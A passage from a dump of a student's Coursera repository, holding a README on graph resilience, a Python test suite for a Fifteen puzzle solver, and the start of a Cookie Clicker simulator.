std::endl;\r\n\telse\r\n\t\tstd::cout << \"Test 2 passed\" << std::endl;\r\n\r\n\t//Test case 3: all vertice can reach from all vertices, 1 cycle\r\n\tvector<vector<int> > adj3(4, vector<int>());\r\n\tadj3[1 - 1].push_back(2 - 1);\r\n\tadj3[2 - 1].push_back(3 - 1);\r\n\tadj3[3 - 1].push_back(4 - 1);\r\n\tadj3[4 - 1].push_back(1 - 1);\r\n\r\n\tif (acyclic(adj3) == 0)\r\n\t\tstd::cout << \"Test 3 failed\" << std::endl;\r\n\telse\r\n\t\tstd::cout << \"Test 3 passed\" << std::endl;\r\n\r\n\r\n\tsystem(\"PAUSE\");\r\n\r\n\t*************************************************************************/\r\n}\r\n"
},
{
"alpha_fraction": 0.7995238304138184,
"alphanum_fraction": 0.8047618865966797,
"avg_line_length": 115.72222137451172,
"blob_id": "2a96f6e6b03c57976f17939eae913374f754a54c",
"content_id": "64d1178933c63ba24298e0e4eca1b7468bdbca75",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2100,
"license_type": "no_license",
"max_line_length": 500,
"num_lines": 18,
"path": "/Fundamentals of Computing Specialization/Algorithmic Thinking (Part 1)/Module 2/README.md",
"repo_name": "rehmanis/Coursera",
"src_encoding": "UTF-8",
"text": "# Project and Application Overviews\n## Project #2: Connect Components and Graph Resilience \n\n* For the Project component of Module 2, you will first write Python code that implements breadth-first search. Then, you will use this function to compute the set of connected components (CCs) of an undirected graph as well as determine the size of its largest connected component. Finally, you will write a function that computes the resilience of a graph (measured by the size of its largest connected component) as a sequence of nodes are deleted from the graph.\n\n* You will use these functions in the Application component of Module 2 where you will analyze the resilience of a computer network, modeled by a graph. As in Module 1, graphs will be represented using dictionaries.\n\nComplete project description can be found at : \n<https://www.coursera.org/learn/algorithmic-thinking-1/supplement/9tlQe/project-2-description>\n\n## Application #2: Analysis of a Computer Network\n\n* Graph exploration (that is, \"visiting\" the nodes and edges of a graph) is a powerful and necessary tool to elucidate properties of graphs and quantify statistics on them. For example, by exploring a graph, we can compute its degree distribution, pairwise distances among nodes, its connected components, and centrality measures of its nodes and edges. As we saw in the Homework and Project, breadth-first search can be used to compute the connected components of a graph.\n\n* In this Application, we will analyze the connectivity of a computer network as it undergoes a cyber-attack. In particular,we will simulate an attack on this network in which an increasing number of servers are disabled. In computational terms, we will model the network by an undirected graph and repeatedly delete nodes from this graph. We will then measure the resilience of the graph in terms of the size of the largest remaining connected component as a function of the number of nodes deleted.\n\nComplete application description can be found at : \n<https://www.coursera.org/learn/algorithmic-thinking-1/supplement/0ekiq/application-2-description>"
},
{
"alpha_fraction": 0.36492159962654114,
"alphanum_fraction": 0.4296209514141083,
"avg_line_length": 42.77567672729492,
"blob_id": "25410c4235f20d54a2ea28d7a55bf16404aba445",
"content_id": "e7aa192253166d1d530d4be9949075c3d9db8f93",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 32396,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 740,
"path": "/Fundamentals of Computing Specialization/Principles of Computing (Part 2)/Mini-Project4 Fifteen Puzzle/fifteen_puzzle_testsuite.py",
"repo_name": "rehmanis/Coursera",
"src_encoding": "UTF-8",
"text": "\"\"\"\nTesting suite for functions used in \nLoyd's Fifteen puzzle - solver Mini-project\nNote that solved configuration has the blank \n(zero) tile in upper left\n\"\"\"\n\nimport poc_simpletest as simpletest\nimport user46_p9CLHFUXsW_56 as puzzle\n\nclass TestFifteenPuzzle():\n \"\"\"\n function that tests the lower_row_invariant\n of the Fifteen puzzle - solver\n \"\"\"\n def test_lower_row_invariant(self):\n # create a TestSuite object\n suite = simpletest.TestSuite() \n\n print \"running lower_row_invariant function test...\"\n\n # Test #1.1: create an scramble board with Zero tile\n # not at target position\n game_board = [[0, 1, 4, 3], \n [9, 7, 5, 8], \n [15, 2, 6, 14], \n [13, 11, 12, 10]]\n my_game = puzzle.Puzzle(4, 4, game_board)\n comp_lower_row_inv = my_game.lower_row_invariant(1,1)\n exp_lower_row_inv = False\n \n # run the Test #1.1 and compare the computed vs expected\n suite.run_test(str(comp_lower_row_inv), str(exp_lower_row_inv), \n \"Test #1.1: lower_row_invariant\")\n \n # Test #1.2: create an scramble board with Zero tile\n # at the target position but still failing the invariant\n game_board = [[8, 1, 4, 3], \n [9, 7, 5, 0], \n [15, 2, 6, 14], \n [13, 11, 12, 10]]\n my_game = puzzle.Puzzle(4, 4, game_board)\n comp_lower_row_inv = my_game.lower_row_invariant(1,3)\n exp_lower_row_inv = False\n \n # run the Test #1.2 and compare the computed vs expected\n suite.run_test(str(comp_lower_row_inv), str(exp_lower_row_inv), \n \"Test #1.2: lower_row_invariant\")\n \n # Test #1.3: create an board with Zero tile not at the \n # target position but all other tiles are in solved position\n game_board = [[0, 1, 4, 3], \n [6, 2, 5, 7], \n [8, 9, 10, 11], \n [12, 13, 14, 15]]\n my_game = puzzle.Puzzle(4, 4, game_board)\n comp_lower_row_inv = my_game.lower_row_invariant(1,2)\n exp_lower_row_inv = False\n \n # run the Test #1.3 and compare the computed vs expected\n suite.run_test(str(comp_lower_row_inv), str(exp_lower_row_inv), \n \"Test #1.3: lower_row_invariant\")\n \n \n \n # Test #1.4: create an scramble board with Zero tile\n # at the target position but invariant is false because \n # the following conidiotn is not met:\n # all tiles in target_row + 1 or below are positioned \n # at their solved location.\n game_board = [[8, 1, 4, 3], \n [9, 5, 0, 7], \n [15, 2, 6, 14], \n [13, 11, 12, 10]]\n my_game = puzzle.Puzzle(4, 4, game_board)\n comp_lower_row_inv = my_game.lower_row_invariant(1,2)\n exp_lower_row_inv = False\n \n # run the Test #1.4 and compare the computed vs expected\n suite.run_test(str(comp_lower_row_inv), str(exp_lower_row_inv), \n \"Test #1.4: lower_row_invariant\")\n \n # Test #1.5: create an scramble board with Zero tile\n # at the target position but invariant is false because \n # the following conidiotn is not met:\n # all tiles in target_row to the right of target position are \n # positioned at their solved location.\n game_board = [[1, 2, 3, 4], \n [5, 7, 0, 6], \n [8, 9, 10, 11], \n [12, 13, 14, 15]]\n my_game = puzzle.Puzzle(4, 4, game_board)\n comp_lower_row_inv = my_game.lower_row_invariant(1,2)\n exp_lower_row_inv = False\n \n # run the Test #1.5 and compare the computed vs expected\n suite.run_test(str(comp_lower_row_inv), str(exp_lower_row_inv), \n \"Test #1.5: lower_row_invariant\")\n \n # Test #1.6: create an scramble board with that meets the \n # lower row invariant\n game_board = [[3, 2, 1, 4], \n [6, 5, 0, 7], \n [8, 9, 10, 11], \n [12, 13, 14, 15]]\n my_game = puzzle.Puzzle(4, 4, game_board)\n comp_lower_row_inv = my_game.lower_row_invariant(1,2)\n exp_lower_row_inv = True\n \n # run the Test #1.6 and compare the computed vs expected\n suite.run_test(str(comp_lower_row_inv), str(exp_lower_row_inv), \n \"Test #1.6: lower_row_invariant\")\n \n # Test #1.7: check row, col corner positions to see if \n # invriant is still valid\n game_board = [[3, 2, 1, 0], \n [4, 5, 6, 7], \n [8, 9, 10, 11], \n [12, 13, 14, 15]]\n my_game = puzzle.Puzzle(4, 4, game_board)\n comp_lower_row_inv = my_game.lower_row_invariant(0,3)\n exp_lower_row_inv = True\n \n # run the Test #1.7 and compare the computed vs expected\n suite.run_test(str(comp_lower_row_inv), str(exp_lower_row_inv), \n \"Test #1.7: lower_row_invariant\")\n \n # Test #1.8: all tiles except for one are in solved position\n # invariant should be False\n game_board = [[3, 2, 1, 10], \n [4, 5, 6, 7], \n [8, 9, 0, 11], \n [13, 12, 14, 15]]\n my_game = puzzle.Puzzle(4, 4, game_board)\n comp_lower_row_inv = my_game.lower_row_invariant(2,2)\n exp_lower_row_inv = False\n \n # run the Test #1.8 and compare the computed vs expected\n suite.run_test(str(comp_lower_row_inv), str(exp_lower_row_inv), \n \"Test #1.8: lower_row_invariant\")\n\n\n # report number of tests and failures\n suite.report_results()\n print \n \n def test_solve_interior_tile(self):\n # create a TestSuite object\n suite = simpletest.TestSuite() \n\n print \"running solve_interior_tile function test...\"\n\n # Test #2.1: check the case when the current column\n # of the target tile is to the right of target_col\n # and current row > 0 \n my_puzzle = puzzle.Puzzle(5, 5, [[1, 2, 3, 4, 5],\n [6, 7, 8, 9, 22],\n [11, 12, 13, 14, 15],\n [16, 17, 18, 19, 20],\n [21, 10, 0, 23, 24]])\n my_puzzle.solve_interior_tile(4, 2)\n comp_out = my_puzzle.lower_row_invariant(4, 1)\n act_out = True\n \n # run the Test #2.1 and compare the computed vs expected\n suite.run_test(str(comp_out), str(act_out), \n \"Test #2.1: solve_interior_tile\")\n \n # Test #2.2: check the case when the current column\n # of the target tile is to the right of target_col\n # and current row of target tile is 0\n my_puzzle = puzzle.Puzzle(5, 5, [[1, 2, 3, 4, 22],\n [6, 7, 8, 9, 5],\n [11, 12, 13, 14, 15],\n [16, 17, 18, 19, 20],\n [21, 10, 0, 23, 24]])\n my_puzzle.solve_interior_tile(4, 2)\n comp_out = my_puzzle.lower_row_invariant(4, 1)\n act_out = True\n \n # run the Test #2.2 and compare the computed vs expected\n suite.run_test(str(comp_out), str(act_out), \n \"Test #2.2: solve_interior_tile\")\n \n # Test #2.3: check the case when the current column\n # of the target tile is to the right of target_col\n # and current row is just above target_row \n my_puzzle = puzzle.Puzzle(5, 5, [[1, 2, 3, 4, 19],\n [6, 7, 8, 9, 5],\n [11, 12, 13, 14, 15],\n [16, 17, 18, 20, 22],\n [21, 10, 0, 23, 24]])\n my_puzzle.solve_interior_tile(4, 2)\n comp_out = my_puzzle.lower_row_invariant(4, 1)\n act_out = True\n \n # run the Test #2.3 and compare the computed vs expected\n suite.run_test(str(comp_out), str(act_out), \n \"Test #2.3: solve_interior_tile\")\n \n # Test #2.4: check the case when the current column\n # of the target tile is to the left of target_col\n # and current row is 0\n my_puzzle = puzzle.Puzzle(5, 5, [[22, 2, 3, 4, 19],\n [6, 7, 8, 9, 5],\n [11, 12, 13, 14, 15],\n [16, 17, 18, 20, 1],\n [21, 10, 0, 23, 24]])\n my_puzzle.solve_interior_tile(4, 2)\n comp_out = my_puzzle.lower_row_invariant(4, 1)\n act_out = True\n \n # run the Test #2.4 and compare the computed vs expected\n suite.run_test(str(comp_out), str(act_out), \n \"Test #2.4: solve_interior_tile\")\n \n # Test #2.5: check the case when the current column\n # of the target tile is to the left of target_col\n # and current row > 0\n my_puzzle = puzzle.Puzzle(5, 5, [[6, 2, 3, 4, 19],\n [22, 7, 8, 9, 5],\n [11, 12, 13, 14, 15],\n [16, 17, 18, 20, 1],\n [21, 10, 0, 23, 24]])\n my_puzzle.solve_interior_tile(4, 2)\n comp_out = my_puzzle.lower_row_invariant(4, 1)\n act_out = True\n \n # run the Test #2.5 and compare the computed vs expected\n suite.run_test(str(comp_out), str(act_out), \n \"Test #2.5: solve_interior_tile\")\n \n # Test #2.6: check the case when the current column\n # of the target tile is to the left of target_col\n # and current row is just above target_row\n my_puzzle = puzzle.Puzzle(5, 5, [[6, 2, 3, 4, 19],\n [16, 7, 8, 9, 5],\n [11, 12, 13, 14, 15],\n [22, 17, 18, 20, 1],\n [21, 10, 0, 23, 24]])\n my_puzzle.solve_interior_tile(4, 2)\n comp_out = my_puzzle.lower_row_invariant(4, 1)\n act_out = True\n \n # run the Test #2.6 and compare the computed vs expected\n suite.run_test(str(comp_out), str(act_out), \n \"Test #2.6: solve_interior_tile\")\n \n # Test #2.7: check the case when the target_col - current column > 1 \n # and current row = target_row\n my_puzzle = puzzle.Puzzle(5, 5, [[6, 2, 3, 4, 19],\n [16, 7, 8, 9, 5],\n [11, 12, 13, 14, 15],\n [22, 17, 18, 20, 1],\n [23, 10, 21, 0, 24]])\n my_puzzle.solve_interior_tile(4, 3)\n comp_out = my_puzzle.lower_row_invariant(4, 2)\n act_out = True\n \n # run the Test #2.7 and compare the computed vs expected\n suite.run_test(str(comp_out), str(act_out), \n \"Test #2.7: solve_interior_tile\")\n \n # Test #2.8: check the case when the (target_col - current column) = 1 \n # and current row = target_row\n my_puzzle = puzzle.Puzzle(5, 5, [[6, 2, 3, 4, 19],\n [16, 7, 8, 9, 5],\n [11, 12, 13, 14, 15],\n [22, 17, 18, 20, 1],\n [21, 10, 23, 0, 24]])\n my_puzzle.solve_interior_tile(4, 3)\n comp_out = my_puzzle.lower_row_invariant(4, 2)\n act_out = True\n \n # run the Test #2.8 and compare the computed vs expected\n suite.run_test(str(comp_out), str(act_out), \n \"Test #2.8: solve_interior_tile\")\n \n # Test #2.9: check the case when the (target_col = current column\n # and current row - target_row = 1\n my_puzzle = puzzle.Puzzle(5, 5, [[6, 2, 3, 4, 19],\n [16, 7, 8, 9, 5],\n [11, 12, 13, 14, 15],\n [22, 17, 18, 23, 1],\n [21, 10, 20, 0, 24]])\n my_puzzle.solve_interior_tile(4, 3)\n comp_out = my_puzzle.lower_row_invariant(4, 2)\n act_out = True\n \n # run the Test #2.9 and compare the computed vs expected\n suite.run_test(str(comp_out), str(act_out), \n \"Test #2.9: solve_interior_tile\")\n \n # Test #2.10: check the case when the (target_col = current column\n # and current row - target_row > 1\n my_puzzle = puzzle.Puzzle(5, 5, [[6, 2, 3, 23, 4],\n [16, 7, 8, 9, 5],\n [11, 12, 13, 14, 15],\n [22, 17, 18, 19, 1],\n [21, 10, 20, 0, 24]])\n my_puzzle.solve_interior_tile(4, 3)\n comp_out = my_puzzle.lower_row_invariant(4, 2)\n act_out = True\n \n # run the Test #2.10 and compare the computed vs expected\n suite.run_test(str(comp_out), str(act_out), \n \"Test #2.10: solve_interior_tile\")\n \n # report number of tests and failures\n suite.report_results()\n print \n \n def test_solve_col0_tile(self):\n # create a TestSuite object\n suite = simpletest.TestSuite() \n\n print \"running solve_col0_tile function test...\"\n\n # Test #3.1: check the case when the target tile's\n # current column is to the right of column 0.\n # current column > 1 and (current row - target_row) = 1\n my_puzzle = puzzle.Puzzle(5, 5, [[1, 2, 3, 4, 5],\n [6, 7, 8, 9, 10],\n [11, 12, 13, 14, 15],\n [16, 17, 18, 19, 20],\n [0, 21, 22, 23, 24]])\n my_puzzle.solve_col0_tile(4)\n comp_out = my_puzzle.lower_row_invariant(3, 4)\n exp_out = True\n \n # run the Test #3.1 and compare the computed vs expected\n suite.run_test(str(comp_out), str(exp_out), \n \"Test #3.1: solve_col0_tile\")\n \n # Test #3.2: check the case when the target tile's\n # current column is to the right of column 0.\n # current column = 1 and (current row - target_row) = 1\n my_puzzle = puzzle.Puzzle(5, 5, [[1, 2, 3, 4, 5],\n [6, 7, 8, 9, 10],\n [11, 12, 13, 14, 15],\n [16, 20, 18, 19, 17],\n [0, 21, 22, 23, 24]])\n my_puzzle.solve_col0_tile(4)\n comp_out = my_puzzle.lower_row_invariant(3, 4)\n exp_out = True\n \n # run the Test #3.2 and compare the computed vs expected\n suite.run_test(str(comp_out), str(exp_out), \n \"Test #3.2: solve_col0_tile\")\n \n # Test #3.3: check the case when the target tile's\n # current column is to the right of column 0 (current column > 1)\n # and current row = 0\n my_puzzle = puzzle.Puzzle(5, 5, [[1, 2, 3, 4, 20],\n [6, 7, 8, 9, 10],\n [11, 12, 13, 14, 15],\n [16, 5, 18, 19, 17],\n [0, 21, 22, 23, 24]])\n my_puzzle.solve_col0_tile(4)\n comp_out = my_puzzle.lower_row_invariant(3, 4)\n exp_out = True\n \n # run the Test #3.3 and compare the computed vs expected\n suite.run_test(str(comp_out), str(exp_out), \n \"Test #3.3: solve_col0_tile\")\n \n # Test #3.4: check the case when the target tile's\n # current column is column 0 (current column = 0) \n # and current row = 0\n my_puzzle = puzzle.Puzzle(5, 5, [[20, 2, 3, 4, 1],\n [6, 7, 8, 9, 10],\n [11, 12, 13, 14, 15],\n [16, 5, 18, 19, 17],\n [0, 21, 22, 23, 24]])\n my_puzzle.solve_col0_tile(4)\n comp_out = my_puzzle.lower_row_invariant(3, 4)\n exp_out = True\n \n # run the Test #3.4 and compare the computed vs expected\n suite.run_test(str(comp_out), str(exp_out), \n \"Test #3.4: solve_col0_tile\")\n \n # Test #3.5: check the case when the target tile's\n # current column is column 0 (current column = 0) \n # and current row = target_row - 1\n my_puzzle = puzzle.Puzzle(5, 5, [[16, 2, 3, 4, 1],\n [6, 7, 8, 9, 10],\n [11, 12, 13, 14, 15],\n [20, 5, 18, 19, 17],\n [0, 21, 22, 23, 24]])\n my_puzzle.solve_col0_tile(4)\n comp_out = my_puzzle.lower_row_invariant(3, 4)\n exp_out = True\n \n # run the Test #3.5 and compare the computed vs expected\n suite.run_test(str(comp_out), str(exp_out), \n \"Test #3.5: solve_col0_tile\")\n \n # report number of tests and failures\n suite.report_results()\n print \n \n def test_row0_invariant(self):\n \n # create a TestSuite object\n suite = simpletest.TestSuite() \n\n print \"running row0_invariant function test...\" \n \n # Test #4.1: tile zero is in the incorrect position\n my_puzzle = puzzle.Puzzle(5, 5, [[2, 3, 0, 1, 4],\n [5, 6, 7, 8, 9],\n [10, 11, 12, 13, 14],\n [15, 16, 17, 18, 19],\n [20, 21, 22, 23, 24]])\n \n comp_out = my_puzzle.row0_invariant(3)\n exp_out = False\n \n # run the Test #4.1 and compare the computed vs expected\n suite.run_test(str(comp_out), str(exp_out), \n \"Test #4.1: row0_invariant\")\n \n # Test #4.2: row 1 tiles are not in their solved\n # positions\n my_puzzle = puzzle.Puzzle(5, 5, [[2, 3, 1, 0, 4],\n [5, 6, 7, 9, 8],\n [10, 11, 12, 13, 14],\n [15, 16, 17, 18, 19],\n [20, 21, 22, 23, 24]])\n \n comp_out = my_puzzle.row0_invariant(3)\n exp_out = False\n \n # run the Test #4.2 and compare the computed vs expected\n suite.run_test(str(comp_out), str(exp_out), \n \"Test #4.2: row0_invariant\")\n \n # Test #4.3: row 0 tiles are not in their solved\n # positions\n my_puzzle = puzzle.Puzzle(5, 5, [[2, 4, 1, 0, 3],\n [5, 6, 7, 8, 9],\n [10, 11, 12, 13, 14],\n [15, 16, 17, 18, 19],\n [20, 21, 22, 23, 24]])\n \n comp_out = my_puzzle.row0_invariant(3)\n exp_out = False\n \n # run the Test #4.3 and compare the computed vs expected\n suite.run_test(str(comp_out), str(exp_out), \n \"Test #4.3: row0_invariant\")\n \n # Test #4.4: a row > 1 has tiles that are not in their solved\n # positions\n my_puzzle = puzzle.Puzzle(5, 5, [[2, 3, 1, 0, 4],\n [5, 6, 7, 8, 9],\n [10, 11, 12, 13, 14],\n [15, 16, 17, 18, 19],\n [20, 21, 23, 22, 24]])\n \n comp_out = my_puzzle.row0_invariant(3)\n exp_out = False\n \n # run the Test #4.4 and compare the computed vs expected\n suite.run_test(str(comp_out), str(exp_out), \n \"Test #4.4: row0_invariant\")\n \n \n # Test #4.5: the puzzle configurate meets the invariant \n my_puzzle = puzzle.Puzzle(5, 5, [[2, 3, 1, 0, 4],\n [5, 7, 6, 8, 9],\n [10, 11, 12, 13, 14],\n [15, 16, 17, 18, 19],\n [20, 21, 22, 23, 24]])\n \n comp_out = my_puzzle.row0_invariant(3)\n exp_out = True\n \n # run the Test #4.5 and compare the computed vs expected\n suite.run_test(str(comp_out), str(exp_out), \n \"Test #4.5: row0_invariant\") \n \n # report number of tests and failures\n suite.report_results()\n print \n \n def test_row1_invariant(self):\n\n # create a TestSuite object\n suite = simpletest.TestSuite() \n\n print \"running row1_invariant function test...\" \n \n # Test #5.1: tile zero is in the incorrect position\n my_puzzle = puzzle.Puzzle(5, 5, [[2, 3, 9, 1, 4],\n [5, 6, 7, 8, 0],\n [10, 11, 12, 13, 14],\n [15, 16, 17, 18, 19],\n [20, 21, 22, 23, 24]])\n \n comp_out = my_puzzle.row1_invariant(3)\n exp_out = False\n \n # run the Test #5.1 and compare the computed vs expected\n suite.run_test(str(comp_out), str(exp_out), \n \"Test #5.1: row1_invariant\")\n \n # Test #5.2: tiles in row 0 to the right of\n # the zero tile are not in their solved position\n my_puzzle = puzzle.Puzzle(5, 5, [[2, 4, 8, 1, 3],\n [5, 7, 6, 0, 9],\n [10, 11, 12, 13, 14],\n [15, 16, 17, 18, 19],\n [20, 21, 22, 23, 24]])\n \n comp_out = my_puzzle.row1_invariant(3)\n exp_out = False\n \n # run the Test #5.2 and compare the computed vs expected\n suite.run_test(str(comp_out), str(exp_out), \n \"Test #5.2: row1_invariant\")\n \n # Test #5.3: tiles in row 1 to the right of\n # the zero tile are not in their solved position\n my_puzzle = puzzle.Puzzle(5, 5, [[2, 3, 9, 1, 4],\n [5, 7, 6, 0, 8],\n [10, 11, 12, 13, 14],\n [15, 16, 17, 18, 19],\n [20, 21, 22, 23, 24]])\n \n comp_out = my_puzzle.row1_invariant(3)\n exp_out = False\n \n # run the Test #5.3 and compare the computed vs expected\n suite.run_test(str(comp_out), str(exp_out), \n \"Test #5.3: row1_invariant\")\n\n # Test #5.4: tiles in row > 1 are not in their solved position\n my_puzzle = puzzle.Puzzle(5, 5, [[2, 3, 8, 1, 4],\n [5, 7, 6, 0, 9],\n [10, 11, 12, 13, 14],\n [15, 16, 18, 17, 19],\n [20, 21, 22, 23, 24]])\n \n comp_out = my_puzzle.row1_invariant(3)\n exp_out = False\n \n # run the Test #5.4 and compare the computed vs expected\n suite.run_test(str(comp_out), str(exp_out), \n \"Test #5.4: row1_invariant\")\n \n # Test #5.5: puzzle configuration meets the invariant\n my_puzzle = puzzle.Puzzle(5, 5, [[2, 3, 8, 1, 4],\n [5, 7, 6, 0, 9],\n [10, 11, 12, 13, 14],\n [15, 16, 17, 18, 19],\n [20, 21, 22, 23, 24]])\n \n comp_out = my_puzzle.row1_invariant(3)\n exp_out = True\n \n # run the Test #5.5 and compare the computed vs expected\n suite.run_test(str(comp_out), str(exp_out), \n \"Test #5.5: row1_invariant\") \n \n # report number of tests and failures\n suite.report_results()\n print\n \n def test_solve_row0_tile(self):\n \n # create a TestSuite object\n suite = simpletest.TestSuite() \n\n print \"running solve_row0_tile function test...\"\n\n # Test #6.1: current position of the target tile \n # is just left of target position and current row\n # is 0\n my_puzzle = puzzle.Puzzle(5, 5, [[3, 1, 2, 4, 0],\n [5, 6, 7, 8, 9],\n [10, 11, 12, 13, 14],\n [15, 16, 17, 18, 19],\n [20, 21, 22, 23, 24]])\n my_puzzle.solve_row0_tile(4)\n comp_out = my_puzzle.row1_invariant(3)\n exp_out = True\n \n # run the Test #6.1 and compare the computed vs expected\n suite.run_test(str(comp_out), str(exp_out), \n \"Test #6.1: solve_row0_tile\")\n \n \n # Test #6.2: current position of the target tile \n # is just left of target position and current row\n # is 1\n my_puzzle = puzzle.Puzzle(5, 5, [[3, 1, 2, 8, 0],\n [5, 6, 7, 4, 9],\n [10, 11, 12, 13, 14],\n [15, 16, 17, 18, 19],\n [20, 21, 22, 23, 24]])\n my_puzzle.solve_row0_tile(4)\n comp_out = my_puzzle.row1_invariant(3)\n exp_out = True\n \n # run the Test #6.2 and compare the computed vs expected\n suite.run_test(str(comp_out), str(exp_out), \n \"Test #6.2: solve_row0_tile\")\n \n \n # Test #6.3: target_col - current column > 1 and \n # current row is 0\n my_puzzle = puzzle.Puzzle(5, 5, [[4, 1, 2, 8, 0],\n [5, 6, 7, 3, 9],\n [10, 11, 12, 13, 14],\n [15, 16, 17, 18, 19],\n [20, 21, 22, 23, 24]])\n my_puzzle.solve_row0_tile(4)\n comp_out = my_puzzle.row1_invariant(3)\n exp_out = True\n \n # run the Test #6.3 and compare the computed vs expected\n suite.run_test(str(comp_out), str(exp_out), \n \"Test #6.3: solve_row0_tile\")\n \n # Test #6.4: target_col - current column > 1 and \n # current row is 1\n my_puzzle = puzzle.Puzzle(5, 5, [[6, 1, 2, 8, 0],\n [5, 4, 7, 3, 9],\n [10, 11, 12, 13, 14],\n [15, 16, 17, 18, 19],\n [20, 21, 22, 23, 24]])\n my_puzzle.solve_row0_tile(4)\n comp_out = my_puzzle.row1_invariant(3)\n exp_out = True\n \n # run the Test #6.4 and compare the computed vs expected\n suite.run_test(str(comp_out), str(exp_out), \n \"Test #6.4: solve_row0_tile\") \n \n # report number of tests and failures\n suite.report_results()\n print \n \n def test_solve_row1_tile(self):\n \n # create a TestSuite object\n suite = simpletest.TestSuite() \n\n print \"running solve_row1_tile function test...\" \n \n # Test #7.1: target_col = current column and \n # current row is 0\n my_puzzle = puzzle.Puzzle(5, 5, [[3, 1, 2, 8, 4],\n [5, 6, 7, 0, 9],\n [10, 11, 12, 13, 14],\n [15, 16, 17, 18, 19],\n [20, 21, 22, 23, 24]])\n my_puzzle.solve_row1_tile(3)\n comp_out = my_puzzle.row0_invariant(3)\n exp_out = True\n \n # run the Test #7.1 and compare the computed vs expected\n suite.run_test(str(comp_out), str(exp_out), \n \"Test #7.1: solve_row1_tile\")\n \n # Test #7.2: target_col - current column = 1 and \n # current row is 0\n my_puzzle = puzzle.Puzzle(5, 5, [[3, 1, 8, 2, 4],\n [5, 6, 7, 0, 9],\n [10, 11, 12, 13, 14],\n [15, 16, 17, 18, 19],\n [20, 21, 22, 23, 24]])\n my_puzzle.solve_row1_tile(3)\n comp_out = my_puzzle.row0_invariant(3)\n exp_out = True\n \n # run the Test #7.2 and compare the computed vs expected\n suite.run_test(str(comp_out), str(exp_out), \n \"Test #7.2: solve_row1_tile\")\n \n # Test #7.3: target_col - current column = 1 and \n # current row is 1\n my_puzzle = puzzle.Puzzle(5, 5, [[3, 1, 7, 2, 4],\n [5, 6, 8, 0, 9],\n [10, 11, 12, 13, 14],\n [15, 16, 17, 18, 19],\n [20, 21, 22, 23, 24]])\n my_puzzle.solve_row1_tile(3)\n comp_out = my_puzzle.row0_invariant(3)\n exp_out = True\n \n # run the Test #7.3 and compare the computed vs expected\n suite.run_test(str(comp_out), str(exp_out), \n \"Test #7.3: solve_row1_tile\")\n \n # Test #7.4: target_col - current column > 1 and \n # current row is 1\n my_puzzle = puzzle.Puzzle(5, 5, [[3, 1, 7, 2, 4],\n [5, 8, 6, 0, 9],\n [10, 11, 12, 13, 14],\n [15, 16, 17, 18, 19],\n [20, 21, 22, 23, 24]])\n my_puzzle.solve_row1_tile(3)\n comp_out = my_puzzle.row0_invariant(3)\n exp_out = True\n \n # run the Test #7.4 and compare the computed vs expected\n suite.run_test(str(comp_out), str(exp_out), \n \"Test #7.4: solve_row1_tile\")\n \n # Test #7.5: target_col - current column > 1 and \n # current row is 0\n my_puzzle = puzzle.Puzzle(5, 5, [[3, 1, 7, 2, 4],\n [5, 8, 6, 0, 9],\n [10, 11, 12, 13, 14],\n [15, 16, 17, 18, 19],\n [20, 21, 22, 23, 24]])\n my_puzzle.solve_row1_tile(3)\n comp_out = my_puzzle.row0_invariant(3)\n exp_out = True\n \n # run the Test #7.5 and compare the computed vs expected\n suite.run_test(str(comp_out), str(exp_out), \n \"Test #7.5: solve_row1_tile\") \n \n # report number of tests and failures\n suite.report_results()\n print \n\n# test all functions of the word wangler pini-project\ntest_puzzle = TestFifteenPuzzle()\ntest_puzzle.test_lower_row_invariant()\ntest_puzzle.test_solve_interior_tile()\ntest_puzzle.test_solve_col0_tile()\ntest_puzzle.test_row0_invariant()\ntest_puzzle.test_row1_invariant()\ntest_puzzle.test_solve_row0_tile()\ntest_puzzle.test_solve_row1_tile()\n\n\n"
},
{
"alpha_fraction": 0.5735543370246887,
"alphanum_fraction": 0.5783575177192688,
"avg_line_length": 31.4678897857666,
"blob_id": "a357a7c6bdb5d6f6cd3b75150ad388c82916b4e5",
"content_id": "506a78037edfebdf65c924d2aa169137594db19a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 10618,
"license_type": "no_license",
"max_line_length": 102,
"num_lines": 327,
"path": "/Fundamentals of Computing Specialization/Principles of Computing (Part 1)/Mini-Project5 Cookie Clicker/cookieclicker.py",
"repo_name": "rehmanis/Coursera",
"src_encoding": "UTF-8",
"text": "\"\"\"\nCookie Clicker Simulator\n\"\"\"\n\nimport simpleplot\nimport math\n\n# Used to increase the timeout, if necessary\nimport codeskulptor\ncodeskulptor.set_timeout(20)\n\nimport poc_clicker_provided as provided\n\n# Constants\nSIM_TIME = 10000000000.0\n\nclass ClickerState:\n \"\"\"\n Simple class to keep track of the game state.\n \"\"\"\n \n def __init__(self):\n self._tot_cookies = 0.0\n self._curr_cookies = 0.0\n self._curr_time = 0.0\n self._curr_cps = 1.0\n # game history has the time, an item that was bought at that time \n # (or None), the cost of the item, and the total number of cookies \n # produced by that time.\n self._game_history = [(0.0, None, 0.0, 0.0)]\n \n def __str__(self):\n \"\"\"\n Return human readable state\n \"\"\"\n state = (\"\\n\"+\"Total cookies: \" + str(self._tot_cookies) +\n \"\\n\" + \"Current cookies: \" + str(self._curr_cookies) + \n \"\\n\" +\"Current time of game: \" + str(self._curr_time) +\n \"s\" + \"\\n\" +\"Current CPS: \" + str(self._curr_cps) + \"\\n\") \n \n \n \n return state\n \n def get_cookies(self):\n \"\"\"\n Return current number of cookies \n (not total number of cookies)\n \n Should return a float\n \"\"\"\n return self._curr_cookies\n \n def get_cps(self):\n \"\"\"\n Get current CPS\n\n Should return a float\n \"\"\"\n return self._curr_cps\n \n def get_time(self):\n \"\"\"\n Get current time\n\n Should return a float\n \"\"\"\n return self._curr_time\n \n def get_history(self):\n \"\"\"\n Return history list\n\n History list should be a list of tuples of the form:\n (time, item, cost of item, total cookies)\n\n For example: [(0.0, None, 0.0, 0.0)]\n\n Should return a copy of any internal data structures,\n so that they will not be modified outside of the class.\n \"\"\"\n return list(self._game_history)\n\n def time_until(self, cookies):\n \"\"\"\n Return time until you have the given number of cookies\n (could be 0.0 if you already have enough cookies)\n\n Should return a float with no fractional part\n \"\"\"\n curr_cookies = self.get_cookies()\n if curr_cookies >= cookies :\n return 0.0\n else:\n curr_cps = self.get_cps()\n cookies_needed = cookies - curr_cookies\n time = math.ceil(cookies_needed / 